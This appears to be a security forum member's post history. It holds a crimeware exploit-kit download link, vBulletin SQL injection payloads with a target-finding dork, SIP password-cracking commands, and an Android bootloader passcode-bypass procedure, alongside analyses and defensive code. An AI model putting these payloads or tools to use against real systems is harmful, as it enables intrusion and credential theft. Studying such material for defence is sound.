Nytro (Posts: 18725, Days Won: 706)
Everything posted by Nytro
-
Leaving that aside... Yes, it's true, a lot more gets posted here. The reason is simple: it's much easier to discuss Coca-Cola vs Pepsi than, say, compiling the kernel. And people don't bother to learn anything... I want to do something about the stupid and useless forum members who post only here, in CERERI and Ajutor, but I don't have time at the moment. Anyway, this category doesn't hurt. You learn a lot here, it's just that many things have nothing to do with IT.
-
Impassioned Framework Download - Another Crimeware Available for Free ! : The Hacker News

Russo is the creator of Impassioned Framework - Browser Exploitation Kit, a subscription-based software vulnerability exploit service. He is a 23-year-old hacker. This toolkit is designed to be stitched into a Web site and probe visitor PCs for security holes that can be used to surreptitiously install malicious software.

Impassioned Framework Recent Attack: Security weaknesses in the hugely popular file-sharing Web site thepiratebay.org have exposed the user names, e-mail and Internet addresses of more than 4 million Pirate Bay users using this Kit.

Browsers Affected:
- Chrome
- Firefox
- Msie 6
- Msie 7
- Msie 8
- Opera
- Safari

OS Affected:
- Windows x
- Unix and OS X NON AFFECTED

Best exploits currently available:
- MS09_002
- MS09_043
- MS Dshow
- iepeers.dll
- Firefox escape
- Firefox CompareTo
- Java Calendar
- Adobe Reader Lib
- Adobe Reader newPlayer
- Adobe Flash 9
- Adobe Flash 10

Black Market Prices:
$1,399 EURO / 1 MONTH LICENSE.
$2,999 EURO / 6 MONTHS LICENSE.
$3,999 EURO / 12 MONTHS LICENSE.

But Now Impassioned Framework is Available for Free Here !! Download, 1.14 MB - Multiupload.com - upload your files to multiple file hosting sites!

Purpose Of Public Release: All most-wanted Crimeware kits are now available for free everywhere; this gives every Security pro more chance to do Research on them, and Antivirus Companies should now cover all these security holes/Exploits as soon as possible in their Next Update.

Download: http://www.multiupload.com/9ELC2CART6

Source: Impassioned Framework Download - Another Crimeware Available for Free ! ~ THN : The Hackers News
-
Hacking Exposed VoIP/SIP - SIPVicious

What is SIPVicious tool suite?
SIPVicious suite is a set of tools that can be used to audit SIP based VoIP systems. It currently consists of four tools:
* svmap - this is a sip scanner. Lists SIP devices found on an IP range
* svwar - identifies active extensions on a PBX
* svcrack - an online password cracker for SIP PBX
* svreport - manages sessions and exports reports to various formats
* svcrash - attempts to stop unauthorized svwar and svcrack scans

Requirements
Python: SIPVicious works on any system that supports python 2.4 or greater.
Operating System: It was tested on the following systems:
* Linux
* Mac OS X
* Windows
* FreeBSD 6.2
* Jailbroken iPhone with python installed
If you use it on systems that are not mentioned here please let me know how it goes.

Hacking Exposed VoIP/SIP
VoIP systems are becoming increasingly popular, and the people they attract are not only legitimate users looking to use them in their business but also those who would like to make free calls at other people's expense. SIP devices are often attacked with the intent of finding the username/password of accounts on that device. VoIP attacks exploit misconfiguration or problems in implementing the PBX system. For testing these vulnerabilities we can use SIPVicious, which is a set of tools that can be used to audit SIP based VoIP systems. It consists of five tools:
* svmap - this is a sip scanner. Lists SIP devices found on an IP range
* svwar - identifies active extensions on a PBX
* svcrack - an online password cracker for SIP PBX
* svreport - manages sessions and exports reports to various formats
* svcrash - attempts to stop unauthorized svwar and svcrack scans
This set of tools is written in Python and can be used on different operating systems.

To better understand the way it works we can use the following scenarios:

- Running svmap to look for SIP phones:

    box $ ./svmap.py 192.168.1.1/24
    | SIP Device         | User Agent   |
    --------------------------------------
    | 192.168.1.111:5868 | Asterisk PBX |
    | 192.168.1.112:5060 | unknown      |
    box $

Here we can find an Asterisk PBX server detected on 192.168.1.111.

- Running svwar with default options on the target Asterisk PBX; these accounts can be used for calling:

    box $ ./svwar.py 192.168.1.111
    | Extension | Authentication |
    ------------------------------
    | 202       | reqauth        |
    | 203       | reqauth        |
    | 200       | reqauth        |
    | 201       | noauth         |
    box $

There are 4 extensions located, from 200 through 203; 201 does not require authorization while the rest require authorization.

- Using svcrack with the optimization enabled can help in discovering number-based passwords, as it just tries three-digit number combinations in order until it finds the password.

    box $ ./svcrack.py 192.168.1.111 -u 201
    | Extension | Password |
    ------------------------
    | 201       | 201      |
    box $

The password for extension 201 is 201, as shown above. To see how the attack works we can use -vv as follows:

    svcrack.py 192.168.1.111 -u 201 -vv

and the screen will display what combination it is trying.

- The cracker can also use a dictionary file full of possible passwords.

    box $ ./svcrack.py 192.168.1.111 -u 203 -d dictionary.txt
    | Extension | Password |
    ------------------------
    | 203       | ascript  |
    box $

If you want to secure your VoIP/SIP, you need to start by setting the Firewall level to allow access for only a specific IP group and add the list of static IP addresses that are going to use the VoIP. If you are working remotely it will also be important to enable VPN for authenticating and encrypting your connection.
Source: Hacking Exposed VoIP/SIP | SecTechno
SIPVicious: http://code.google.com/p/sipvicious/
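The scenarios above are the attacker's view: svwar walking extensions and svcrack guessing one extension's password. Both leave a recognisable trace on the PBX, a burst of failed REGISTER attempts from one source, either spread across many extensions or concentrated on one. The Python script below is an added example, not part of the SecTechno post and not SIPVicious code. It parses Asterisk chan_sip-style "Registration ... failed" notices (the line format is assumed from Asterisk 1.8-era logs and may need adjusting for other PBXes; the sample lines are constructed for the example, not a real capture) and raises one alert per source for each of the two patterns inside a sliding window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Asterisk chan_sip-style failed-REGISTER notice. The exact shape is an
# assumption based on Asterisk 1.8-era logs; adapt the pattern to your PBX.
FAILED_REG = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d)\] NOTICE\[\d+\] chan_sip\.c: "
    r"Registration from '\"?(?P<ext>[^\"<' ]+)\"? <sip:[^>]*>' failed for "
    r"'(?P<ip>\d+\.\d+\.\d+\.\d+):\d+' - (?P<reason>.+)$")


def parse_failed_registration(line):
    """Return a dict for a failed-REGISTER notice, or None for any other line."""
    m = FAILED_REG.match(line)
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
            "ext": m["ext"], "ip": m["ip"], "reason": m["reason"]}


def detect_sip_scans(lines, window=timedelta(seconds=60),
                     enum_threshold=8, guess_threshold=15):
    """One alert per (source IP, pattern) observed inside a sliding window.

    enumeration: many *different* extensions failing from one IP (svwar-like)
    guessing:    many failures against the *same* extension from one IP (svcrack-like)
    """
    recent = defaultdict(deque)      # ip -> deque of (timestamp, extension)
    already = set()
    alerts = []
    for line in lines:
        ev = parse_failed_registration(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        q.append((ev["ts"], ev["ext"]))
        while q and ev["ts"] - q[0][0] > window:   # expire events older than the window
            q.popleft()
        exts = [ext for _, ext in q]
        distinct = len(set(exts))
        same = exts.count(ev["ext"])
        if distinct >= enum_threshold and (ev["ip"], "enumeration") not in already:
            already.add((ev["ip"], "enumeration"))
            alerts.append({"ip": ev["ip"], "kind": "enumeration",
                           "detail": "%d distinct extensions in %ds" % (distinct, window.seconds)})
        if same >= guess_threshold and (ev["ip"], "guessing") not in already:
            already.add((ev["ip"], "guessing"))
            alerts.append({"ip": ev["ip"], "kind": "guessing",
                           "detail": "%d failures for extension %s in %ds"
                                     % (same, ev["ext"], window.seconds)})
    return alerts


def sample_log():
    """Constructed log lines (not a real capture) showing the three behaviours."""
    fmt = ("[May 22 %s] NOTICE[1234] chan_sip.c: Registration from "
           "'\"%s\" <sip:%s@192.168.1.111>' failed for '%s:5060' - %s")
    lines = []
    # 192.168.1.50 walks extensions 200..209 within ten seconds (enumeration)
    for i in range(10):
        ext = str(200 + i)
        lines.append(fmt % ("10:00:%02d" % i, ext, ext, "192.168.1.50", "No matching peer found"))
    # 192.168.1.60 hits extension 201 twenty times in a row (password guessing)
    for i in range(20):
        lines.append(fmt % ("10:01:%02d" % i, "201", "201", "192.168.1.60", "Wrong password"))
    # 192.168.1.70 is a real phone whose user mistyped the password twice (benign)
    for i in range(2):
        lines.append(fmt % ("10:02:%02d" % (i * 30), "203", "203", "192.168.1.70", "Wrong password"))
    lines.append("[May 22 10:03:00] NOTICE[1234] chan_sip.c: Peer '203' is now Reachable. (12ms / 2000ms)")
    return lines


if __name__ == "__main__":
    for alert in detect_sip_scans(sample_log()):
        print(alert)
```

The thresholds and the 60-second window are starting points; measure your own PBX's normal failure rate before wiring this into fail2ban-style blocking, otherwise a user with a mistyped password gets locked out alongside the scanner. The firewall and VPN advice at the end of the post removes most of this noise at the network edge; the log check catches what still gets through.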
-
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
Nytro posted a topic in Exploituri
vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
====================================================================
#vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
#[+] Discovered By : D4rkB1t
#[+] Site : NaN
#[+] support e-mail : d4rkb1t@live.com
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
--------------------------
# ~Vulnerable Codes~ #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
--------------------------
# ~Exploit~ #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
More info: http://j0hnx3r.org/?p=818
--------------------------
# ~Advice~ #
--------------------------
Vendor already released a patch on vb#4.1.3. UPDATE NOW!
====================================================================
# 1337day.com [2011-5-21]
====================================================================
Source: vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability
Info: vBulletin® 4.x SQL Injection Vulnerability « J0hn.X3r
It has been public for a while (thanks "d"), but I see it now shows up on exploit-db as well.
Video Demonstration by TinK: -
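The injection works because the values of the cat[] array reach the search query's IN (...) list as raw SQL text, so one element can close the list with ')' and append its own UNION SELECT; that the list is built this way is inferred from the payload shape above, and the real vBulletin code is not reproduced here. The script below is an added example, not vBulletin's code and not the advisory's. It builds a throwaway SQLite database with an assumed schema, runs the same shape of query in a vulnerable and a hardened form, and shows the hardened form rejecting the injected value before anything reaches the database. SQLite does not treat '#' as a comment, so the payload's trailing '#' is written as '--' here.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the forum database; the schema is an assumption."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE socialgroup (groupid INTEGER, name TEXT, categoryid INTEGER);
        CREATE TABLE user (userid INTEGER, username TEXT, email TEXT, password TEXT, salt TEXT);
        INSERT INTO socialgroup VALUES (1, 'Linux users', 1);
        INSERT INTO socialgroup VALUES (2, 'Kernel hackers', 2);
        INSERT INTO socialgroup VALUES (3, 'Off topic', 3);
        INSERT INTO user VALUES (1, 'admin', 'admin@example.invalid',
                                 'HASH-PLACEHOLDER', 'SALT-PLACEHOLDER');
    """)
    return con


def search_groups_vulnerable(con, cat):
    # The defect class: every cat[] value is spliced into the IN (...) list as
    # SQL text, so a value that ends the list with ')' can append a UNION SELECT.
    sql = "SELECT name FROM socialgroup WHERE categoryid IN (%s)" % ",".join(cat)
    return [row[0] for row in con.execute(sql)]


def search_groups_fixed(con, cat):
    # Layer 1: anything that is not a plain decimal integer is rejected outright.
    # Layer 2: the surviving values are bound as parameters, never pasted into SQL.
    ids = []
    for value in cat:
        if not re.fullmatch(r"[0-9]+", value):
            raise ValueError("category id must be a decimal integer, got %r" % (value,))
        ids.append(int(value))
    placeholders = ",".join("?" * len(ids))
    sql = "SELECT name FROM socialgroup WHERE categoryid IN (%s)" % placeholders
    return [row[0] for row in con.execute(sql, ids)]


def demo():
    """Run both variants against the same injected cat[] value and report the outcome."""
    con = make_db()
    # Same shape as the advisory's third payload, with '--' in place of MySQL's '#'.
    injected = ["1) UNION SELECT username || ':' || password FROM user WHERE userid=1 --"]
    leaked = sorted(search_groups_vulnerable(con, injected))
    try:
        search_groups_fixed(con, injected)
        rejected = False
    except ValueError:
        rejected = True
    return {"vulnerable_returns": leaked,
            "fixed_rejects": rejected,
            "fixed_normal": sorted(search_groups_fixed(con, ["1", "2"]))}


if __name__ == "__main__":
    print(demo())
```

The same two layers apply unchanged to MySQL: cast or validate each array element as an integer, then bind the list with placeholders. Validation alone is enough for integer ids; binding is what keeps the fix from rotting when someone later adds a string-valued filter to the same query.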
I think it's the other way around, that real-life socializing leads to online socializing. That is, I add someone as a "friend" on Facebook, or someone adds me, after we've met in everyday life. I have only a few online "friends" whom I don't know in everyday life. And I don't think spending a lot of time on social networks is harmful. You can find out an awful lot about your friends there...
-
Stanford computer scientists find Internet security flaw BY MELISSAE FELLET Researchers at the Stanford Security Laboratory create a computer program to defeat audio captchas on website account registration forms, revealing a design flaw that leaves them vulnerable to automated attacks. Stanford researchers have found an audible security weakness on the Internet. If you've ever registered for online access to a website, it's likely you were required as part of the process to correctly read a group of distorted letters and numbers on the screen. That's a simple test to prove you're a human, not a computer program with malicious intent. Though computers are good at filling out forms, they struggle to decipher these wavy images crisscrossed with lines, known as captchas (short for Completely Automated Public Turing test to tell Computers and Humans Apart). But there's a second type of captcha, and it may pose more of a security weakness. These audio captchas, designed to help the visually impaired, require users to accurately listen to a string of spoken letters and/or numbers disguised with background noise. John Mitchell, a professor of computer science, postdoctoral researcher Elie Bursztein and colleagues built a computer program that could listen to and correctly decipher commercial audio captchas used by Digg, eBay, Microsoft, Yahoo and reCAPTCHA, a company that creates captchas. The researchers presented their results during a symposium on security and privacy in Oakland, Calif. The Stanford program, called Decaptcha, successfully decoded Microsoft's audio captcha about 50 percent of the time. It correctly broke only about 1 percent of reCAPTCHA's codes, the most difficult ones of those tested, but even this small success rate is considered trouble for websites such as YouTube and Facebook that get hundreds of millions of visitors each day. Imagine a large network of malicious computers creating many fake accounts on YouTube. 
This robot network of accounts could highly rate the same video, falsely increasing its popularity and thereby its advertising revenue. "Bot" networks could also swamp email accounts with spam messages.

Decoding sounds
Computers have a tough time attempting to read image captchas, but Mitchell and Bursztein wondered if audio captchas were safe from automated attacks, too. The researchers taught their program to recognize the unique sound patterns for every letter of the alphabet, as well as numeral digits. Then they challenged their software to decode audio captchas it had never heard before. The program worked by identifying the sound shapes in the target captcha file, comparing them to those stored in its memory. It worked: the software could to some extent imitate human hearing. "In the battle of humans versus computers, we lost round one for audio captchas," Bursztein said. "But we have a good idea of what round two should be." Designing captchas is challenging. The tests must be simple enough for users to answer quickly, yet complicated enough so computers struggle to decipher the patterns. Background noise in an audio captcha can confuse computers, but little is known about the types of noises that trip them up the most. The researchers generated 4 million audio captchas mixed with white noise, echoes or music, and challenged the program to decode them. After training Decaptcha with some samples, they took it for a test drive. The program easily defeated captchas mixed with static or repetition, with a 60 to 80 percent success rate, but background music made the task more difficult. Decaptcha removes the background noise from each audio file, leaving distinctively shaped spikes of energy for each digit or letter in the captcha. The program clearly isolates these spikes from white noise or echoes. But when the captcha contains noises that mimic these energy spikes, Decaptcha is often confused. Building a program to solve captchas is "an interesting test case for machine learning technology," said Mitchell. "For audio, it's in a realm where machines should do better than humans."

Add meaning
And they do, until they have to think like us. Music lyrics or garbled voices are forms of semantic noise, sounds that carry meaning. Humans can recognize a message mixed with semantic noise, but computers can't distinguish the two clearly. Decaptcha correctly solved only about 1 percent of these captchas. Of the commercial captchas the team tested, reCAPTCHA was the strongest because it contains background conversation and other semantic noise. Microsoft and Digg have recently changed their audio captchas to use this technology, Bursztein said. But the creation of this latest captcha cracker shows that even the best approach isn't secure enough. "The replacement technology isn't there yet, but we've pinpointed the problem," he said. Citing data obtained from eBay, the researchers say about 1 percent of people who register at the site use audio captchas. That's enough users to warrant an effort to strengthen this security device. The researchers suggest programmers tap into our human ability to understand meaning in sounds to improve future captchas. More secure puzzles could include background music or entire words instead of a string of letters. But the team cautions that programmers need to keep the human user in mind. If the captcha is too complicated, legitimate users won't be able to decode it. Despite efforts to strengthen audio captchas against computer attacks, they will, like visual captchas, still be vulnerable to crowdsourced attacks by a group of people manually solving captchas for low wages. Captchas are vital to freedom on the Internet, the researchers say, as the value of many social media sites depends on the assumption that fellow users are humans. "Captchas are a big inconvenience to people," Mitchell said. "The fact that they're so widely used is evidence of their necessity."

Stanford researcher Hristo Paskov also contributed to the study. The Stanford team collaborated with Romain Beauxis from Tulane University and Daniele Perito and Celine Fabry from INRIA, a computer science research institute in France. The research was funded by the National Science Foundation, the Air Force Office of Scientific Research and the Office of Naval Research. Melissae Fellet is a science-writing intern at the Stanford News Service.
Source: Stanford computer scientists find Internet security flaw
-
React OS, the Windows replacement?
Nytro replied to nedo's topic in Sisteme de operare si discutii hardware
I wanted to get involved, but it's not easy at all; they don't do trivial things there. Look for the book Windows NT Internals (co-author: Alex Ionescu, a Romanian) if you like this kind of thing. -
Kernel compiling the Debian way
On this episode you are going to watch how to compile a kernel, the Debian way. Further info at lgallardo.com/en/2010/01/25/compilar-el-kernel-a-lo-debian/
Video: Kernel compiling the Debian way on Vimeo
How to compile the kernel quickly and easily, ending up with a .deb... It may only work on Debian. I haven't tried it.
-
Where Are the Ethics in Hacking?
May 23, 2011 - Upasana Gupta

A recent news story begs the question: What is "ethical" hacking? You may have heard about Australian security researcher Christian Heinrich, who hacked live into Facebook's privacy controls at an IT security conference and accessed private photographs of rival security professional Chris Gatford and his family, including the image of a child. The incident led to a journalist being arrested and having his iPad seized after he published some of the images online.

Following the event, detective superintendent Brian Hay, head of the Fraud and Corporate Crime Group of the Queensland Police Service, criticized the demonstration of so-called ethical hacking. "I think cultures have built up where hacking, in the past, has been a part of a competition, and you have black-hat conferences around the world. The technical reality is that on those occasions crimes may well have been committed." This latest incident has left many questioning what role ethics play in ethical hacking, and what this activity really is about.

"The reason ethical hacking exists is because somebody less ethical in a different country will hack your systems and not tell you - that is going to happen no matter what," says Jeremiah Grossman, Founder and CTO of WhiteHat Security. "So, ethical hacking is conducted to hack yourself first and fix the issues and vulnerabilities that remain to avoid being a headline like Sony." Ethical hackers, then, attempt to exploit the IT security of a system on behalf of its owners by following certain polite rules, like getting written or verbal consent from the owner of the system before the professional conducts the test. "What the Australian researcher did is not ethical hacking," says Jay Bavisi, President of EC-Council, a global certification and training organization for ethical hackers. "A lot of people don't understand the difference between hacking and ethical hacking."

Terms like penetration testing, ethical hacking and hacking are used interchangeably, and Bavisi defines each:
Hacker: simply a person who invades or interferes with another system with the intent to cause harm, without having any permission from the system owner.
Ethical hacker: a professional hired by an organization to review its security posture from the eyes of the hacker. Ethical hackers test vulnerabilities of the systems.
Penetration tester: a professional who goes a step beyond the ethical hacker and provides an active analysis of the system for any potential vulnerabilities that could result from poor or improper system configuration, either known or unknown hardware or software flaws, or operational weaknesses. These professionals are largely involved in remediation.

The whole process involves written consent and rules of engagement from the client, which clearly spell out what they can or cannot do. "This is basically our 'get out of jail free' card," Bavisi says. Still, Ian Glover, president of the UK's Council of Registered Ethical Security Testers (CREST), a global organization that assesses the skill and competence of professionals working in the penetration testing industry, says, "I don't like the term ethical hacking." According to him, the term is misleading, as hacking immediately presents a negative view of people mounting unsolicited illegal attacks. The professional penetration industry provides an invaluable service to government and business validating security controls. While individuals who believe they can work illegally still exist, the professional penetration testing industry acts in a responsible manner within a strict legal and ethical framework. "In the past there was the opportunity to be a hacker, to do inappropriate things and then people would employ you. In the future that is not going to be the case, as neither the industry nor the buying community will accept individuals who have operated illegally," Glover says. The industry has matured, he says, and because of that the bar of entry is much higher for prospective testers. In this case, he adds that if Heinrich were a member of a professional organization like CREST, he would be immediately removed for his actions.

There are ethics and morals involved when ethical hackers take up such contracts or positions. They clearly understand their limits as dictated by the letter of authorization, where the client specifies the scope of engagement: for instance, the servers that can or cannot be tested, the IP range ethical hackers can use, etc. These professionals are aware of the legal framework and understand the requirement for full disclosure to the client. "Without permission, no ethical hacker will touch the job and go beyond the scope in any form. This is standard security practice," Bavisi says. The latest incident is just an example of a bad hacker, adds Grossman. "The researcher made a rather common mistake of demonstrating a live vulnerability on stage without permission. Would I have done it? No!" One of the key lessons in this case is the need for better education within the industry to highlight the differences among hackers, ethical hackers and penetration testers. "People must understand the difference between a cop and a thief," Bavisi says.
Source: Where Are the Ethics in Hacking?
-
React OS, the Windows replacement?
Nytro replied to nedo's topic in Sisteme de operare si discutii hardware
There's nothing they can do. They didn't copy anything from Microsoft. I understand that Microsoft asked for an analysis of the source code, after the source code of some Windows NT, I think, appeared on the net many years ago, and nothing was copied. Their work is their own or "borrowed" from Wine (you know what that is). They just look at MSDN, see what functions Microsoft has, and write them themselves from scratch. I also wanted to write 2-3 functions that I saw weren't implemented, but it would be preferable for someone who knows better to do it. PS: You will often run into the message: function not implemented. And you can learn a lot from the source code; I was looking over their loader... -
Intercepting GSM Traffic This is the first talk about GSM security held at DeepSec in 2007. Steve talks about intercepting GSM traffic and attacking the A5 encryption algorithm. There were more talks at DeepSec 2009 and 2010. Video: http://vimeo.com/24117925
-
Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader
By cedric » Sunday 22 May 2011, 10:48 - General

Android devices are becoming increasingly present everywhere. iPhone security has been analyzed by researchers; however this is more difficult for Android devices due to the diversity of vendors and devices: each model has its own characteristics and has a unique combination of hardware and software. What will be discussed here is an unexpected feature of the stock HTC Desire Z bootloader that allows an attacker to access any file on the device before the Linux operating system starts, bypassing the passcode protection entirely.

There is a great variety of Android devices from various manufacturers (HTC, Samsung, Motorola, etc.) and customised by numerous telecommunication operators (Orange, T-Mobile, etc.). Before loading the operating system (i.e. Android), these devices generally pre-load a bootloader. This bootloader is not open-source, contrary to the Android source code, and differs from one device to another. Some manufacturers implement a way for the end-user to interact with it using serial over USB. An example below of the available commands of an HTC Desire Z:

    hboot>h
    command list
    keytest
    heap
    boot
    reset
    powerdown
    rebootRUU
    heap_test
    rtask
    task
    enableqxdm
    gencheckpt
    list_partition_emmc
    load_emmc
    check_emmc
    check_emmc_mid
    read_emmc
    get_wp_info_emmc
    send_wp_info_emmc
    get_ext_csd_emmc
    get_sector_info_emmc

One command that got my attention is the read_emmc command.

    hboot>read_emmc
    command format: read_emmc [start] [#blocks] [#blocks/read] [show]

You can specify the starting offset with the number of blocks to read and it will basically display to you in hexadecimal format the bytes that are on your phone's flash. Below is the first sector, which is actually a partition table.

    hboot>read_emmc 0 1 1 1
    reading sector 0 ~ 0
    0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ...
    0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 0 0 0 4D 0 0 0 1 0 0 0 E8 3 0 0 0 0 0 0 45 0 0 0 E9 3 0 0 80 0 0 0 0 0 0 0 46 0 0 0 69 4 0 0 28 23 0 0 0 0 0 0 5 0 0 0 91 27 0 0 6E 58 45 0 55 AA
    read sector done
    average = 583

The first idea that came to my mind was to dump the whole flash using this method, but it is really slow. It took 6 hours to dump 10 MB, so it would take approximately 33 days to get 1.3 GB... So I decided to use FUSE (Filesystem in Userspace) to mount the user data partition remotely and get only the files I want. You basically have to implement these four functions: getattr, readdir, open and read. The phone's filesystem becomes accessible through one device file, let's name it dev. Reads on this file will be proxied by FUSE over USB to the read_emmc implementation on the device. Writes will not be implemented because we do not need them (and we do not have commands such as write_emmc). Consequently, this dev file will have *read only* attributes.

    # ls -l mnt
    total 0
    -r--r--r-- 1 root root 1232076288 1970-01-01 01:00 dev

We now have a virtual disk image that we are able to mount and get the files we are interested in:

    # dd if=mnt/dev of=first_sector bs=512 count=1
    # mount -o loop,ro -t ext2 mnt/dev mnt2
    # cp mnt2/data/com.android.providers.telephony/databases/mmssms.db dump/
    # cp mnt2/data/com.android.providers.contacts/databases/contacts2.db dump/

Finally, we are able to get the files storing the passcode information (as a numerical PIN code, for example, below) if the end-user defined one.

    # cp mnt2/data/com.android.providers.settings/databases/settings.db dump/
    # cp mnt2/system/password.key dump/

The salt is stored in the settings.db SQLite database. The passcode is simply stored in hashed form in password.key: SHA-1(password|salt)|MD5(password|salt). So it is easy to bruteforce from the computer once we get the file.

This basically shows how some devices may implement things or leave some doors open in a way that allows an attacker to bypass security protections...
Source: Passcode bypass of the HTC Desire Z using an unexpected feature of the bootloader - Sogeti ESEC Lab
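The first sector the post dumps is a conventional MBR: four 16-byte partition entries starting at offset 446, followed by the 0x55AA signature. Parsing it tells you which sector ranges to hand to read_emmc (or to the FUSE proxy) when you only want one partition rather than the whole 1.3 GB. The parser below is an added example, not code from cedric's post or from Sogeti ESEC Lab. It rebuilds sector 0 from the bytes visible in the dump (zero-filling the elided leading bytes, which the dump prints as a run of '0') and lists each entry with its LBA start, size and the matching read_emmc arguments. The type codes 0x4D, 0x45 and 0x46 are left unnamed because the post does not say what this device maps them to; 0x05 is the usual extended-partition type.

```python
import struct

SECTOR = 512


def mbr_from_post_dump():
    """Rebuild sector 0 from the partition-table bytes shown in the post's
    read_emmc output; bytes before offset 446 are zero-filled."""
    table = bytes.fromhex(
        "80000000 4D000000 01000000 E8030000"   # slot 1: active, type 0x4D, LBA 1, 1000 sectors
        "00000000 45000000 E9030000 80000000"   # slot 2: type 0x45, LBA 1001, 128 sectors
        "00000000 46000000 69040000 28230000"   # slot 3: type 0x46, LBA 1129, 9000 sectors
        "00000000 05000000 91270000 6E584500"   # slot 4: type 0x05 (extended), LBA 10129
    )
    return b"\x00" * 446 + table + b"\x55\xAA"


def has_mbr_signature(sector0):
    """True for a 512-byte sector ending in the 0x55AA boot signature."""
    return len(sector0) == SECTOR and sector0[510:512] == b"\x55\xAA"


def parse_mbr(sector0):
    """Parse the four classic partition entries; unused (all-zero) slots are skipped."""
    if not has_mbr_signature(sector0):
        raise ValueError("not a 512-byte sector with the 0x55AA signature")
    entries = []
    for i in range(4):
        # status(1) chs_start(3) type(1) chs_end(3) lba_start(4) sector_count(4), little-endian
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from(
            "<B3sB3sII", sector0, 446 + 16 * i)
        if ptype == 0 and count == 0:
            continue
        entries.append({
            "slot": i + 1,
            "active": status == 0x80,
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
            "byte_offset": lba * SECTOR,
            "byte_length": count * SECTOR,
            # the bootloader's syntax is read_emmc [start] [#blocks] [#blocks/read] [show]
            "read_emmc": "read_emmc %d %d 1 1" % (lba, count),
        })
    return entries


if __name__ == "__main__":
    for e in parse_mbr(mbr_from_post_dump()):
        print("slot %(slot)d type 0x%(type)02X start %(lba_start)d "
              "sectors %(sectors)d -> %(read_emmc)s" % e)
```

Run it against the first_sector file the post extracts with dd (open it in binary mode and pass the 512 bytes to parse_mbr) to get the same table from a real device. Slot 4 is an extended partition, so the logical partitions inside it have their own EBR chain starting at LBA 10129, which this parser does not follow.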
-
Inside a Malicious PDF Attack
By Tomer Bitton, Security Research, Imperva

PDFs are a widely used business file format, which makes them a common target for malware attacks. On the surface, PDFs are secure, but because they have so many "features," hackers have learned how to hide attacks deep under the surface. By using a number of utilities, we are able to reverse engineer the techniques in malicious PDFs, providing insight that we can ultimately use to better protect our systems.

PDF as Text
By opening the PDF file with a text editor it is possible to see that there are some encrypted objects. The first circle, object 11, is a command to execute Javascript in object 12. The second and third circles are a command for object 12 to filter the Javascript with AsciiHexDecode. The main reason for this filter is to hide malicious code inside the PDF and avoid anti-virus detection. This is our first red flag.

Decoding the Hex
This second image shows how the stream is decoded, but additional analysis is required to make sense of it. Again, we will open this code with a text editor to understand its purpose.

Hex as Text
Opening this code as text, the circle indicates it is Javascript, which is another red flag. We will now work to determine its intent.

Malzilla Analysis of Javascript
By using a utility called Malzilla, we can analyze the Javascript. We input the Javascript in the top box and decode it with the circled button. A closer look at the second circle indicates that this Javascript contains shellcode, yet another red flag.

A Closer Look at the Shellcode
This is a closer view of the shellcode. Shellcode is typically used to exploit vulnerabilities while avoiding detection. Shellcode has earned its name for launching a command shell for the attacker to control.

Shellcode as Exe
Again, we run a utility, this time to convert the shellcode into an Executable file, which we save, so that we can take an even closer look at its function.

Exe through IDA
Here, we run yet another utility, IDA, which enables us to disassemble and debug the commands of the Executable file. As we have highlighted, this file contains multiple Nop slide functions, which are used in Shellcode attacks since the location of the Shellcode is not precisely known. This raises another red flag. From here, we should see if there are any interesting binary strings.

Binary Strings
Here we have circled multiple binary strings that should raise concern. One of the circled items, URLDownloadToFileA, is a Windows API function to download a file from a remote server and to save it on the user's PC. In this infected PDF, the shellcode uses it to point the PC to an infection point, which is the IP address we have circled (by the way, don't visit that IP address). Once the infected file is downloaded, the shellcode will execute it, infecting the computer. There you have it! Like "Inception," you have to go deeper to find what is truly at the heart of this infected PDF. Hackers are intelligent about wrapping Executable files in shellcode, encrypting it and hiding it in Javascript within PDF files, but by reverse engineering their techniques, we gain a better understanding of our vulnerabilities and can work to strengthen our security posture.

Tomer Bitton is a security researcher at Imperva.
Source: Inside a Malicious PDF Attack | threatpost
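The article's chain starts with two static observations: an action object that references JavaScript, and a stream whose /Filter hides that script behind ASCIIHexDecode. Both can be checked without opening the file in a reader. The triage script below is an added example, not Imperva's tooling and not code from the article. It walks "N 0 obj ... endobj" objects with regular expressions, resolves /JS references, applies ASCIIHexDecode and FlateDecode in the order the dictionary lists them, and returns the red flags together with the recovered script. The sample PDF it builds is constructed for the example with a harmless placeholder script; only the object numbers 11 and 12 mirror the article.

```python
import binascii
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+0\s+obj(.*?)endobj", re.S)
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
FILTER_RE = re.compile(rb"/Filter\s*(\[[^\]]*\]|/\w+)")


def ascii_hex_decode(data):
    """PDF ASCIIHexDecode: whitespace is ignored, '>' ends the data,
    and a trailing odd digit is treated as if followed by 0."""
    data = data.split(b">", 1)[0]
    digits = re.sub(rb"\s+", b"", data)
    if len(digits) % 2:
        digits += b"0"
    return binascii.unhexlify(digits)


FILTERS = {b"ASCIIHexDecode": ascii_hex_decode, b"FlateDecode": zlib.decompress}


def parse_objects(pdf):
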